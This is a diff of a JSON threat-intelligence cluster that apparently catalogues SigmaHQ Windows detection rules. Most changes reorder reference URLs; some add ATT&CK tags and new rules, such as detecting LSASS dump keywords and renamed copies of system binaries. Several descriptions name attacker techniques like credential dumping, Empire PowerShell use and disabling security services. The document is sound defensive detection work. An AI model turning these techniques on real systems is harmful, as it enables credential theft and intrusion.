"https://www.hybrid-analysis.com/sample/4be06ecd234e2110bd615649fe4a6fa95403979acf889d7e45a78985eb50acf9?environmentId=1", + "https://github.com/albertzsigovits/malware-notes/blob/c820c7fea76cf76a861b28ebc77e06100e20ec29/Ransomware/Maze.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_product_class.yml" ], "tags": [ @@ -63756,9 +64766,9 @@ "logsource.product": "windows", "refs": [ "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml" ], "tags": [ @@ -63792,8 +64802,8 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/", - "https://twitter.com/mrd0x/status/1511415432888131586", "https://twitter.com/mrd0x/status/1511489821247684615", + "https://twitter.com/mrd0x/status/1511415432888131586", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_susp_execution.yml" ], "tags": [ @@ -63837,8 +64847,20 @@ "https://www.mandiant.com/resources/evolution-of-fin7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_public_folder.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.t1059.001" + ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", "value": "Execution of Powershell Script in Public Folder" }, @@ -63855,9 +64877,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/frack113/status/1555830623633375232", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", + "https://twitter.com/frack113/status/1555830623633375232", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_path_use_image.yml" ], "tags": [ @@ -63891,14 +64913,18 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/albertzsigovits/malware-notes/blob/558898932c1579ff589290092a2c8febefc3a4c9/Ransomware/Lockbit.md", + "https://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_usage.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1070" + "attack.impact", + "attack.t1070", + "attack.t1485" ] }, "related": [ @@ -63908,6 +64934,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" } ], "uuid": "add64136-62e5-48ea-807e-88638d02df1e", @@ -64118,9 +65151,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/cloudflare/cloudflared", "https://developers.cloudflare.com/cloudflare-one/connections/connect-apps", "https://blog.reconinfosec.com/emergence-of-akira-ransomware-group", - "https://github.com/cloudflare/cloudflared", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_run.yml" ], "tags": [ @@ -64169,12 +65202,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", - "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", - "https://twitter.com/JohnLaTwC/status/835149808817991680", - "https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil", "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", + "https://learn.microsoft.com/en-us/archive/blogs/pki/basic-crl-checking-with-certutil", + "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", + "https://twitter.com/JohnLaTwC/status/835149808817991680", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_decode.yml" ], "tags": [ @@ -64207,10 +65240,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", - "https://github.com/antonioCoco/RogueWinRM", - "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://twitter.com/Cyb3rWard0g/status/1453123054243024897", + "https://github.com/antonioCoco/RogueWinRM", + "https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_child_process_as_system_.yml" ], "tags": [ @@ -64243,8 +65276,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://o365blog.com/aadinternals/", "https://github.com/Gerenios/AADInternals", + "https://o365blog.com/aadinternals/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml" ], "tags": [ @@ -64486,8 +65519,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "https://github.com/malcomvetter/CSExec", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_csexec.yml" ], "tags": [ @@ -64602,8 +65635,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/nas_bench/status/1535431474429808642", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/", + "https://twitter.com/nas_bench/status/1535431474429808642", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml" ], "tags": [ @@ -64645,8 +65678,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/", + "https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml" ], "tags": [ @@ -64781,8 +65814,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", + "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_susp_custom_source.yml" ], "tags": [ @@ -64816,8 +65849,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/", + "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_atbroker.yml" ], "tags": [ @@ -64851,8 +65884,8 @@ "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Rasautou/", - "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", "https://github.com/fireeye/DueDLLigence", + "https://www.fireeye.com/blog/threat-research/2019/10/staying-hidden-on-the-endpoint-evading-detection-with-shellcode.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml" ], "tags": [ @@ -64918,8 +65951,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/993497996179492864", "https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml", + "https://twitter.com/pabraeken/status/993497996179492864", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml" ], "tags": [ @@ -65264,10 +66297,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html", - "https://atomicredteam.io/defense-evasion/T1220/", "https://twitter.com/mattifestation/status/986280382042595328", "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", + "https://web.archive.org/web/20190209154607/https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html", + "https://atomicredteam.io/defense-evasion/T1220/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml" ], "tags": [ @@ -65451,8 +66484,8 @@ "refs": [ "https://github.com/gordonbay/Windows-On-Reins/blob/e587ac7a0407847865926d575e3c46f68cf7c68d/wor.ps1", "https://vms.drweb.fr/virus/?i=24144899", - "https://twitter.com/JohnLaTwC/status/1415295021041979392", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", + "https://twitter.com/JohnLaTwC/status/1415295021041979392", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_disable_sec_services.yml" ], "tags": [ @@ -65485,8 +66518,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://sourceforge.net/projects/mouselock/", "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", + "https://sourceforge.net/projects/mouselock/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_mouselock_execution.yml" ], "tags": [ @@ -65544,8 +66577,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_export_keys.yml" ], "tags": [ @@ -65613,9 +66646,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", + "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_weak_or_abused_passwords.yml" ], "tags": [ @@ -65697,39 +66730,6 @@ "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "value": "Sticky Key Like Backdoor Execution" }, - { - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "meta": { - "author": "Florian Roth (Nextron Systems), Tigzy", - "creation_date": "2021/11/17", - "falsepositive": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" - ], - "filename": "proc_creation_win_winrar_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/cyb3rops/status/1460978167628406785", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_execution.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "related": [ - { - "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "related-to" - } - ], - "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", - "value": "Winrar Execution in Non-Standard Folder" - }, { "description": "Detects WmiPrvSE spawning a process", "meta": { @@ -65844,8 +66844,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml" ], "tags": [ @@ -65880,8 +66880,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html", + "https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_plink.yml" ], "tags": [ @@ -66001,8 +67001,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-", "https://github.com/elastic/protections-artifacts/blob/084067123d3328a823b1c3fdde305b694275c794/behavior/rules/persistence_suspicious_scheduled_task_creation_via_masqueraded_xml_file.toml", + "https://docs.microsoft.com/en-us/windows/win32/taskschd/daily-trigger-example--xml-", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_via_masqueraded_xml_file.yml" ], "tags": [ @@ -66044,10 +67044,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", - "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", + "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_hide_sevices.yml" ], "tags": [ @@ -66082,10 +67082,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", "https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt", - "https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md", - "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_execution_path.yml" ], "tags": [ @@ -66139,6 +67139,44 @@ "uuid": "744a188b-0415-4792-896f-11ddb0588dbc", "value": "Potential Process Injection Via Msra.EXE" }, + { + "description": "Detects the presence of the keywords \"lsass\" and \".dmp\" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.\n", + "meta": { + "author": "E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2019/10/24", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_lsass_dmp_cli_keywords.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/Hackndo/lsassy", + "https://github.com/CCob/MirrorDump", + "https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/", + "https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf", + "https://github.com/helpsystems/nanodump", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_dmp_cli_keywords.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "ffa6861c-4461-4f59-8a41-578c39f3f23e", + "value": "LSASS Dump Keyword In CommandLine" + }, { "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", "meta": { @@ -66280,6 +67318,43 @@ "uuid": "caa06de8-fdef-4c91-826a-7f9e163eef4b", "value": "RunDLL32 Spawning Explorer" }, + { + "description": "Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.\nOften used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.\n", + "meta": { + "author": "Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems)", + "creation_date": "2020/07/03", + "falsepositive": [ + "Depend on scripts and administrative tools used in the monitored environment (For example an admin scripts like https://www.itexperience.net/sccm-batch-files-and-32-bits-processes-on-64-bits-os/)", + "When cmd.exe and xcopy.exe are called directly", + "When the command contains the keywords but not in the correct order" + ], + "filename": "proc_creation_win_susp_copy_system_dir.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120", + "https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ] + }, + "related": [ + { + "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "fff9d2b7-e11c-4a69-93d3-40ef66189767", + "value": "Suspicious Copy From or To System Directory" + }, { "description": "Detects suspicious powershell command line parameters used in Empire", "meta": { @@ -66293,9 +67368,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", - "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178", + "https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165", + "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml" ], @@ -66362,9 +67437,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/_felamos/status/1204705548668555264", "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", - "https://twitter.com/_felamos/status/1204705548668555264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml" ], "tags": [ @@ -66397,9 +67472,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", "https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png", "https://github.com/vmware/open-vm-tools/blob/master/open-vm-tools/tools.conf", + "https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml" ], "tags": [ @@ -66466,8 +67541,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", "https://github.com/harleyQu1nn/AggressorScripts", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_software_discovery.yml" ], "tags": [ @@ -66586,9 +67661,9 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", - "https://twitter.com/jseerden/status/1247985304667066373/photo/1", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", "https://twitter.com/lefterispan/status/1286259016436514816", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://twitter.com/jseerden/status/1247985304667066373/photo/1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_agentexecutor_potential_abuse.yml" ], "tags": [ @@ -66624,8 +67699,20 @@ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_exec_data_file.yml" ], - "tags": "No established tags" + "tags": [ + "attack.execution", + "attack.t1059.001" + ] }, + "related": [ + { + "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", "value": "Powershell Inline Execution From A File" }, @@ -66677,9 +67764,9 @@ "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpresult_execution.yml" ], "tags": [ @@ -66712,10 +67799,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", + "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" ], "tags": [ @@ -66893,8 +67980,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/bohops/status/1477717351017680899?s=12", - "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/", + "https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml" ], "tags": [ @@ -66917,8 +68004,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://twitter.com/0gtweet/status/1564968845726580736", + "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" ], @@ -66961,17 +68048,17 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", - "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", - "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", - "https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/", - "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", - "https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html", - "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml", + "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", + "https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html", + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", + "https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml" ], "tags": [ @@ -67022,10 +68109,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/DLLRunner", "https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/", - "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", "https://twitter.com/cyb3rops/status/1186631731543236608", + "https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/", + "https://github.com/Neo23x0/DLLRunner", 